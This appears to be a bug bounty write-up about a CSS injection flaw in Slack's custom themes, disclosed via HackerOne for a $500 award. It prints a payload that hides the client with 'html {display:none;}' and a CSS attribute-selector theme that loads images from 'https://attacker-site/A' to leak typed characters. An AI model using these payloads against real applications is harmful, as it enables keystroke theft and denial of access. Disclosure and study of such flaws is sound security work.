Back in August I found a vulnerability in Slack which allowed me to keylog slack input via custom themes. I came across this vulnerability when we were having some discussions in my work’s slack regarding using CSS to change the font to comic-sans, as seen below:


Neat right? However this is pretty harmless and likely wouldn’t result in a bounty - maybe a low for no input sanitization. However, I was determined to find a way in which this could genuinely become dangerous. A co-worker, d12, pointed out that #FFFFFF;} html {display:none;} could be used to prevent the user’s slack instance from rendering, which is certainly much worse than just changing fonts. It should be noted that once one slack instance was modified all other instances were also modified since the theme was persisted across clients (yes… I managed to lock myself out of multiple slack test instances).

However, my ultimate goal was data exfiltration… wouldn’t it be great if we could see all the links to cat memes in the slack instance we’re not a part of? This is the point in which I learned that CSS supports attribute selectors for specific values. More specifically that CSS allows you to determine the most recent value added to any type of input via the [value$="<value>"] selector. Furthermore, slack allows loading of external images. With this knowledge I present to you my very own custom slack theme:

#FFFFFF;}INPUT[TYPE="TEXT"][VALUE$="A"] { BACKGROUND-IMAGE: URL("https://attacker-site/A"); },#350d36,#1264A3,#FFFFFF,#350D36,#FFFFFF,#2BAC76,#CD2553

This theme is capable of determining when the user types the letter A into an <input type="text"> on slack. When the user does this the CSS will load the background image https://attacker-site/A which can then be logged server side to indicate the user typed the letter A. This was as much of a PoC I needed to demo to slack that it was indeed possible to exfiltrate data provided the user actually applied the custom theme. Thankfully the 1-click custom theme option was not exploitable so it still required the user to copy/paste the theme which would certainly raise suspicions.

Here’s the PoC video I sent slack of the request being logged locally. Note how I go into channels instead of typing a message, that’s because the channel option used a text input while the message input was more complicated. I’m sure it would have been possible to write some CSS to select on the attributes there but this was enough to prove exfil was even possible.

PoC exploit video

Slack has kindly decided to disclose the vulnerability on hackerone.


For finding this vulnerability slack awarded me $500. I’m using that money to match donations to my Movember campaign. If you’d like to learn more or donate click here.